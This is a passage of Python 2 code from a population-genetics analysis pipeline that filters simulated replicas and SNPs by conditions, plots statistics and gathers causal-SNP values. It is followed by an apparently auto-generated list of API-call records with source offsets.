xbound = None, ybound = None,
getio = None ):
"""Draw a scatter plot where for each replica we have a pair of values.
"""
args = Dict( 'Ddata thinSfx replicaTables scenCond scen2sfxs replicaCond allScens' )
if getio: return dict( depends_on = findReplicasMatchingConds( getio = True, **args )[ 'depends_on' ],
creates = outFile,
name = 'scatterPlotReplicaStatistic' + Sfx( nameSfx ),
mediumRuleNameSfx = ( replicaStatX, replicaStatY ), attrs = dict( piperun_short = True ) )
x = []
y = []
urls = []
nskipped = 0
colors = []
if IsSeq( replicaShow ): replicaShow = '"_".join(map(str,["%.2f" % v if isinstance(v,float) else v for v in (' + ','.join( map( str, replicaShow ) ) + ')]))'
for r in findReplicasMatchingConds( showHeadings = ( 'valX', 'valY', 'valShow' ) + tmap( operator.itemgetter( 0 ),
replicaColorings ),
showVals = ( replicaStatX, replicaStatY,
replicaShow if replicaShow is not None else '0' ) +
tmap( operator.itemgetter( 1 ), replicaColorings ),
**args ):
x.append( r.valX )
y.append( r.valY )
urls.append( '%s_%d_x=%s_y=%s' % ( r.scenario, r.replicaNum,
'%.2f' % r.valX if isinstance( r.valX, float ) else r.valX,
'%.2f' % r.valY if isinstance( r.valY, float ) else r.valY ) +
( ( '' if str( r.valShow).startswith('_') else '_' ) + str( r.valShow ) if replicaShow else '' ) )
if replicaColorings:
colorHere = None
for name, cond, color in replicaColorings:
if r[ name ]:
colorHere = color
break
colors.append( colorHere if colorHere is not None else replicaDefaultColor )
pp.scatter( **Dict( 'x y urls', c = colors if colors else 'b' ) )
pp.axis( 'equal' )
if xbound: pp.gca().set_xbound( *xbound )
if ybound: pp.gca().set_ybound( *ybound )
if not xbound and not ybound:
start = min( min(x), min(y) )
rng = max( max( x ) - min( x ), max(y) - min(y) )
pp.plot( [ start, start+rng ], [ start, start+rng ], 'g--' )
pp.xlabel( replicaStatX )
pp.ylabel( replicaStatY )
if title: pp.title( title )
pp.savefig( outFile )
def findTableFiles( Ddata, thinSfx, whichStats, tables, scenCond, allScens, scen2sfxs ):
"""Return table files used in conditions"""
tables = MakeSeq( tables )
scen2sfxs = dict( scen2sfxs )
scenCondExpr = compile_expr( scenCond )
ourScens = [ scen for scen in allScens if eval( scenCondExpr, globals(), ScenAttrs( scen ) ) ]
depends_on = []
scen2table2file = {}
for scen in ourScens:
thisScenDict = {}
for table in tables:
# identify the scenario-specific suffix for this table
scenSfx = DictGet( scen2sfxs, scen, '' )
if scenSfx:
if IsSeq( scenSfx ): scenSfx = dict( scenSfx )
if not isinstance( scenSfx, types.StringTypes ): scenSfx = DictGet( dict( scenSfx ),
os.path.splitext( table )[0], '' )
tableFile = os.path.join( Ddata, whichStats+ thinSfx, scen.scenDir(),
AddFileSfx( table + ( '.tsv' if '.' not in table else '' ),
scenSfx )
+ ( '/' if table.endswith( '.data' ) else '' ) )
depends_on.append( tableFile )
thisScenDict[ table ] = tableFile
scen2table2file[ scen ] = thisScenDict
tableNames = map( operator.itemgetter( 0 ), map( os.path.splitext, tables ) )
return tableNames, tables, ourScens, scen2table2file, depends_on
def FindChromCol( iDotData ):
"""Find the column representing the replica or chromosome, based on our conventions."""
return 'replicaNum' if 'replicaNum' in iDotData.headings else ( 'Chrom' if 'Chrom' in iDotData.headings else 'chrom' )
def FindPosCol( iDotData ):
"""Find the column representing the SNP position, based on our conventions."""
return 'Pos' if 'Pos' in iDotData.headings else 'pos'
class NameCollector(ast.NodeVisitor):
"""Gather table names used in an expression"""
def __init__(self):
self.names = []
def visit_Name(self, node):
self.names.append( node.id )
@staticmethod
def getNamesIn( expr ):
nc = NameCollector()
nc.visit( ast.parse( expr ) )
return tuple( set( nc.names ) )
def FindTables( *exprs ):
"""Find tables referenced in specified expressions"""
return tuple( set( reduce( operator.concat, map( NameCollector.getNamesIn, exprs ) ) ) - set( ( 'True', 'False' ) ) )
def findReplicasMatchingConds( Ddata,
replicaTables = None, replicaCond = 'True',
outFile = None,
scenCond = 'True',
showHeadings = (),
showVals = (),
allScens = GetScenarios(),
scen2sfxs = {},
thinSfx = '',
getio = None ):
"""Make an IDotData containing specified per-replica values for replicas meeting specified conditions."""
dbg( '"findReplicasMatchingConds" scenCond replicaTables replicaCond showHeadings showVals scen2sfxs' )
if replicaTables is None: replicaTables = FindTables( replicaCond, *MakeSeq( showVals ) )
replicaTables = tuple( set( MakeSeq( replicaTables ) ) )
replicaTableNames, replicaTables, ourScens, scen2table2file, depends_on = \
findTableFiles( whichStats = 'replicastats', tables = replicaTables,
**Dict( 'Ddata thinSfx scenCond allScens scen2sfxs' ) )
if getio: return dict( depends_on = depends_on,
creates = outFile,
attrs = dict( piperun_short = True ) )
replicaCondExpr = compile_expr( replicaCond )
showVals = MakeSeq( showVals )
showValsExpr = map( compile_expr, showVals )
if not showHeadings:
showHeadings = map( MakeAlphaNum, showVals )
showHeadings2 = []
for h in showHeadings:
h_new = h
i = 1
while h_new in showHeadings2:
h_new = h + Sfx( i )
i += 1
showHeadings2.append( h_new )
showHeadings = showHeadings2
def makeResult():
yield ( 'scenario', 'replicaNum' ) + tuple( MakeSeq( showHeadings ) )
numReplicasSkippedTot, numReplicasAllowedTot = 0, 0
for scen in ourScens:
logging.info( '"findReplicasMatchingConds" scen' )
numReplicasSkipped, numReplicasAllowed = 0, 0
thisScenDict = scen2table2file[ scen ]
replicaTableVals = [ IDotData( thisScenDict[ replicaTable ] ) for replicaTable in replicaTables ]
for replicaTableRows in \
IDotData.TableIterInnerJoinAuxAsTuples( tableIters = map( iter, replicaTableVals ),
cols = map( FindChromCol, replicaTableVals ),
blanks = ( None, ) * len( replicaTableVals ),
headingLens = map( IDotData.rootClass.numCols,
replicaTableVals ) ):
vdict = dict( zip( replicaTableNames, replicaTableRows ) )
dbg( 'scen vdict' )
evalHere = lambda expr: eval( expr, globals(), vdict )
if evalHere( replicaCondExpr ):
numReplicasAllowed += 1
yield [ scen.scenName(), replicaTableRows[0].replicaNum ] + map( evalHere, showValsExpr )
else:
numReplicasSkipped += 1
dbg( '"in_scenario" scen numReplicasSkipped numReplicasAllowed' )
numReplicasSkippedTot += numReplicasSkipped
numReplicasAllowedTot += numReplicasAllowed
dbg( 'numReplicasSkippedTot numReplicasAllowedTot' )
r = IDotData.fromFn( makeResult )
if outFile: r.save( outFile )
return r
def findSnpsMatchingConds( Ddata,
snpTables = (), snpCond = 'True', replicaTables = (), replicaCond = 'True',
outFile = None,
scenCond = 'True',
showHeadings = (),
showVals = (),
allScens = GetScenarios(),
scen2sfxs = {},
thinSfx = '',
getio = None ):
"""Make an IDotData containing specified per-replica values for SNPs meeting specified conditions in
replicas meeting specified conditions."""
snpTables = tuple( set( MakeSeq( snpTables ) ) )
dbg( '"findSnpsMatchingConds" scenCond snpTables snpCond replicaTables replicaCond showHeadings showVals '
'scen2sfxs' )
replicaArgs = Dict( 'Ddata thinSfx scenCond allScens scen2sfxs' )
snpTableNames, snpTables, ourScens, scen2table2file, depends_on = \
findTableFiles( whichStats = 'snpStats', tables = snpTables, **replicaArgs )
if getio: return dict( depends_on = depends_on + findTableFiles( whichStats = 'replicastats', tables = replicaTables,
**replicaArgs )[-1],
creates = outFile )
snpCondExpr = compile_expr( snpCond )
showVals = MakeSeq( showVals )
showValsExpr = map( compile_expr, showVals )
if not showHeadings: showHeadings = map( MakeAlphaNum, showVals )
numSnpsSkippedTot, numSnpsAllowedTot = 0, 0
def makeResult():
yield ( 'scenario', 'replicaNum', 'Pos' ) + tuple( MakeSeq( showHeadings ) )
for scen in ourScens:
dbg( '"findSnpsMatchingConds" scen ')
numSnpsAllowed, numSnpsSkipped = 0, 0
replicasHere = findReplicasMatchingConds( **MergeDicts( replicaArgs,
Dict( 'replicaTables replicaCond scenCond',
allScens = ( scen, ) ) ) )
replicasHereSet = frozenset( replicasHere.replicaNum )
dbg( 'scen len(replicasHereSet) replicasHereSet' )
thisScenDict = scen2table2file[ scen ]
dbg( '#[ ( thisScenDict[ snpTable ] ) for snpTable in snpTables ]' )
snpTableVals = [ IDotData( thisScenDict[ snpTable ] ) for snpTable in snpTables ]
lastReplica = None
lastReplicaResult = None
replicaCol = FindChromCol( snpTableVals[ 0 ] )
posCol = FindPosCol( snpTableVals[ 0 ] )
numSnpsSkippedTot, numSnpsAllowedTot = 0, 0
for snpTableRows in \
IDotData.TableIterInnerJoinAuxAsTuples( tableIters = map( iter, snpTableVals ),
cols = zip( map( FindChromCol, snpTableVals ),
map( FindPosCol, snpTableVals ) ),
blanks = ( None, ) * len( snpTableVals ),
headingLens = map( IDotData.rootClass.numCols,
snpTableVals ) ):
thisReplica = snpTableRows[0][ replicaCol ]
if thisReplica != lastReplica:
thisReplicaResult = ( thisReplica in replicasHereSet )
if not thisReplicaResult: dbg( '"SKIPPING_REPLICA" thisReplica' )
lastReplicaResult = thisReplicaResult
lastReplica = thisReplica
if thisReplicaResult:
localDict = dict( zip( snpTableNames, snpTableRows ) )
evalHere = lambda expr: eval( expr, globals(), localDict )
evalResult = evalHere( snpCondExpr )
if evalResult:
v = [ scen.scenName(), thisReplica, snpTableRows[0][ posCol ] ] \
+ map( evalHere, showValsExpr )
numSnpsAllowed += 1
yield v
else: numSnpsSkipped += 1
numSnpsSkippedTot += numSnpsSkipped
numSnpsAllowedTot += numSnpsAllowed
dbg( 'scen numSnpsSkippedTot numSnpsAllowedTot' )
dbg( '"finalCount" numSnpsSkippedTot numSnpsAllowedTot' )
r = IDotData.fromFn( makeResult )
if outFile: r.save( outFile )
return r
def gatherCausalStat( Ddata, scenario, snpStatFN, replicaCol = 'Chrom', posCol = 'Pos', getio = None ):
"""Gather a specified per-SNP statistic just for the causal SNPs, and write them out as a replicastat.
"""
replicaStatFN = string.replace( snpStatFN, 'snpStats', 'replicastats', 1 )
if getio: return dict( depends_on = snpStatFN, creates = replicaStatFN, attrs = dict( scenario = scenario.scenDir() ) )
snpStatFile = IDotData( snpStatFN )
with IDotData.openForWrite( replicaStatFN, snpStatFile.headings ) as replicaStatFile:
for r in snpStatFile:
if r[ posCol ] == CAUSAL_POS:
replicaStatFile.writeRecord( r )
def DefineRulesTo_gatherCausalStat( pr, Ddata, scen2snpStatFN, posCol = 'Pos' ):
"""Define rules to gather a specified per-SNP statistic for the causal SNPs into a replica stat."""
for scenario, snpStatFN in scen2snpStatFN.items():
pr.addInvokeRule( invokeFn = gatherCausalStat, invokeArgs = Dict( 'Ddata scenario snpStatFN posCol' ) )
| [
"Operations.Shari_Operations.localize.Scenario.GetScenarios",
"Operations.MiscUtil.dbg",
"matplotlib.pyplot.ylabel",
"Operations.MiscUtil.compile_expr",
"Operations.MiscUtil.ReplaceFileExt",
"itertools.izip",
"Operations.MiscUtil.Dict",
"operator.itemgetter",
"logging.info",
"Operations.Shari_Oper... | [((871, 892), 'matplotlib.use', 'matplotlib.use', (['"""agg"""'], {}), "('agg')\n", (885, 892), False, 'import matplotlib\n'), ((4643, 4683), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', (['mutAges', 'mutPops', 'mutFreqs'], {}), '(mutAges, mutPops, mutFreqs)\n', (4655, 4683), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((5606, 5628), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['replicaTables'], {}), '(replicaTables)\n', (5613, 5628), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((5647, 5665), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['snpTables'], {}), '(snpTables)\n', (5654, 5665), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((5695, 5720), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['replicaCond'], {}), '(replicaCond)\n', (5707, 5720), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((5741, 5762), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['snpCond'], {}), '(snpCond)\n', (5753, 5762), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((5783, 5804), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['snpStat'], {}), '(snpStat)\n', (5795, 5804), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((5822, 5846), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', 'sfx'], {}), '(outFile, sfx)\n', (5832, 5846), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((5868, 5896), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', '"""stats"""'], {}), "(outFile, 'stats')\n", (5878, 5896), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((5911, 5925), 'Operations.MiscUtil.IsSeq', 'IsSeq', (['scenSfx'], {}), '(scenSfx)\n', (5916, 5925), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((7686, 7734), 'Operations.MiscUtil.Histogrammer', 'Histogrammer', ([], {'binSize': 'binSize', 'binShift': 'binShift'}), '(binSize=binSize, binShift=binShift)\n', (7698, 7734), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((7791, 7810), 'itertools.izip', 'izip', (['*snpTableVals'], {}), '(*snpTableVals)\n', (7795, 7810), False, 'from itertools import izip\n'), ((8562, 8607), 'logging.info', 'logging.info', (['"""saving histogram to """', 'outFile'], {}), "('saving histogram to ', outFile)\n", (8574, 8607), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((8920, 8934), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', ([], {}), '()\n', (8932, 8934), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((9522, 9562), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', 'sfx', 'replicaCondSfx'], {}), '(outFile, sfx, replicaCondSfx)\n', (9532, 9562), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((9584, 9612), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', '"""stats"""'], {}), "(outFile, 'stats')\n", (9594, 9612), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((9627, 9702), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata thinSfx replicaTables scenCond replicaCond scen2sfxs allScens"""'], {}), "('Ddata thinSfx replicaTables scenCond replicaCond scen2sfxs allScens')\n", (9631, 9702), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((10102, 10131), 'Operations.MiscUtil.Histogrammer', 'Histogrammer', ([], {'binSize': 'binSize'}), '(binSize=binSize)\n', (10114, 10131), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((10541, 10555), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', ([], {}), '()\n', (10553, 10555), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((11137, 11189), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', 'sfx', 'replicaCondSfx', 'snpCondSfx'], {}), '(outFile, sfx, replicaCondSfx, snpCondSfx)\n', (11147, 11189), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((11211, 11239), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', '"""stats"""'], {}), "(outFile, 'stats')\n", (11221, 11239), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((11254, 11357), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata thinSfx snpTables snpCond replicaTables scenCond replicaCond scen2sfxs allScens"""'], {}), "(\n 'Ddata thinSfx snpTables snpCond replicaTables scenCond replicaCond scen2sfxs allScens'\n )\n", (11258, 11357), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((11742, 11771), 'Operations.MiscUtil.Histogrammer', 'Histogrammer', ([], {'binSize': 'binSize'}), '(binSize=binSize)\n', (11754, 11771), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((12082, 12110), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', '"""stats"""'], {}), "(outFile, 'stats')\n", (12092, 12110), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((13463, 13481), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['histFiles'], {}), '(histFiles)\n', (13470, 13481), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((13614, 13638), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', 'sfx'], {}), '(outFile, sfx)\n', (13624, 13638), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((13933, 13962), 'matplotlib.pyplot.figure', 'pp.figure', (['(1)'], {'figsize': 'figSize'}), '(1, figsize=figSize)\n', (13942, 13962), True, 'import matplotlib.pyplot as pp\n'), ((16512, 16531), 'matplotlib.pyplot.savefig', 'pp.savefig', (['outFile'], {}), '(outFile)\n', (16522, 16531), True, 'import matplotlib.pyplot as pp\n'), ((17136, 17154), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['histFiles'], {}), '(histFiles)\n', (17143, 17154), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((17630, 17659), 'matplotlib.pyplot.figure', 'pp.figure', (['(1)'], {'figsize': '(18, 6)'}), '(1, figsize=(18, 6))\n', (17639, 17659), True, 'import matplotlib.pyplot as pp\n'), ((17681, 17712), 'matplotlib.pyplot.subplots_adjust', 'pp.subplots_adjust', ([], {'bottom': '(0.37)'}), '(bottom=0.37)\n', (17699, 17712), True, 'import matplotlib.pyplot as pp\n'), ((17722, 17752), 'matplotlib.pyplot.xlabel', 'pp.xlabel', (["(xlabel + '\\n\\n\\n\\n')"], {}), "(xlabel + '\\n\\n\\n\\n')\n", (17731, 17752), True, 'import matplotlib.pyplot as pp\n'), ((17759, 17776), 'matplotlib.pyplot.ylabel', 'pp.ylabel', (['ylabel'], {}), '(ylabel)\n', (17768, 17776), True, 'import matplotlib.pyplot as pp\n'), ((17784, 17797), 'matplotlib.pyplot.hold', 'pp.hold', (['(True)'], {}), '(True)\n', (17791, 17797), True, 'import matplotlib.pyplot as pp\n'), ((18840, 18855), 'matplotlib.pyplot.title', 'pp.title', (['title'], {}), '(title)\n', (18848, 18855), True, 'import matplotlib.pyplot as pp\n'), ((19076, 19095), 'matplotlib.pyplot.savefig', 'pp.savefig', (['outFile'], {}), '(outFile)\n', (19086, 19095), True, 'import matplotlib.pyplot as pp\n'), ((19469, 19483), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', ([], {}), '()\n', (19481, 19483), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((21085, 21107), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['scenCond'], {}), '(scenCond)\n', (21097, 21107), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((21130, 21151), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['replicaConds'], {}), '(replicaConds)\n', (21137, 21151), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((21177, 21202), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['replicaCondsSfxs'], {}), '(replicaCondsSfxs)\n', (21184, 21202), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((21225, 21242), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['snpConds'], {}), '(snpConds)\n', (21232, 21242), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((21264, 21285), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['snpCondsSfxs'], {}), '(snpCondsSfxs)\n', (21271, 21285), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((21353, 21377), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', 'sfx'], {}), '(outFile, sfx)\n', (21363, 21377), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((28874, 28896), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['scenCond'], {}), '(scenCond)\n', (28886, 28896), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((29126, 29147), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['replicaConds'], {}), '(replicaConds)\n', (29133, 29147), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((29173, 29198), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['replicaCondsSfxs'], {}), '(replicaCondsSfxs)\n', (29180, 29198), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((32491, 32513), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['replicaTables'], {}), '(replicaTables)\n', (32498, 32513), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((34530, 34553), 'Operations.Shari_Operations.localize.Scenario.GetSelectionScenarios', 'GetSelectionScenarios', ([], {}), '()\n', (34551, 34553), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((36220, 36241), 'Operations.IDotData.IDotData', 'IDotData', (['condsFileFN'], {}), '(condsFileFN)\n', (36228, 36241), False, 'from Operations.IDotData import IDotData\n'), ((36257, 36275), 'Operations.IDotData.IDotData', 'IDotData', (['inFileFN'], {}), '(inFileFN)\n', (36265, 36275), False, 'from Operations.IDotData import IDotData\n'), ((38019, 38033), 'Operations.MiscUtil.dbg', 'dbg', (['"""inFiles"""'], {}), "('inFiles')\n", (38022, 38033), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((38053, 38074), 'Operations.IDotData.IDotData', 'IDotData', (['condsFileFN'], {}), '(condsFileFN)\n', (38061, 38074), False, 'from Operations.IDotData import IDotData\n'), ((39965, 40040), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata thinSfx replicaTables scenCond scen2sfxs replicaCond allScens"""'], {}), "('Ddata thinSfx replicaTables scenCond scen2sfxs replicaCond allScens')\n", (39969, 40040), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((40474, 40492), 'Operations.MiscUtil.IsSeq', 'IsSeq', (['replicaShow'], {}), '(replicaShow)\n', (40479, 40492), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((42017, 42033), 'matplotlib.pyplot.axis', 'pp.axis', (['"""equal"""'], {}), "('equal')\n", (42024, 42033), True, 'import matplotlib.pyplot as pp\n'), ((42342, 42365), 'matplotlib.pyplot.xlabel', 'pp.xlabel', (['replicaStatX'], {}), '(replicaStatX)\n', (42351, 42365), True, 'import matplotlib.pyplot as pp\n'), ((42372, 42395), 'matplotlib.pyplot.ylabel', 'pp.ylabel', (['replicaStatY'], {}), '(replicaStatY)\n', (42381, 42395), True, 'import matplotlib.pyplot as pp\n'), ((42434, 42453), 'matplotlib.pyplot.savefig', 'pp.savefig', (['outFile'], {}), '(outFile)\n', (42444, 42453), True, 'import matplotlib.pyplot as pp\n'), ((42608, 42623), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['tables'], {}), '(tables)\n', (42615, 42623), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((42684, 42706), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['scenCond'], {}), '(scenCond)\n', (42696, 42706), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((45372, 45386), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', ([], {}), '()\n', (45384, 45386), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((45642, 45748), 'Operations.MiscUtil.dbg', 'dbg', (['""""findReplicasMatchingConds" scenCond replicaTables replicaCond showHeadings showVals scen2sfxs"""'], {}), '(\'"findReplicasMatchingConds" 